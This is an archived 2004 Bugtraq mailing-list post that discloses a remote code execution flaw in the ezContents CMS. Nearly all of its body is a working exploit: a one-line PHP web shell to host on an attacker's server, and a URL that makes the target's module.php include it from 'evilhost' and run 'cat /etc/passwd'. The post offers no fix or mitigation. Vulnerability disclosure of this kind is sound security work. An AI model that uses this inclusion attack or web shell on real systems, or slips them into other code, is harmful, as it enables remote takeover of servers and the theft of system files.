[33060] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Remote Code Execution in ezContents

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Mon Jan 12 13:38:33 2004

Date: 10 Jan 2004 17:13:58 -0000
Message-ID: <20040110171358.17989.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com



Remote Code Execution in ezContents

"ezContents" from www.ezcontents.org allows to execute code.

Example:

Create the following file on your webserver:

----index.php----
<?
system($cmd);
?>
-----------------

And then type in the following URL:

http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd


Zero X, member of www.lobnan.de and www.lostkey.org


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[33060] in bugtraq

Remote Code Execution in ezContents

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)Mon Jan 12 13:38:33 2004

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Mon Jan 12 13:38:33 2004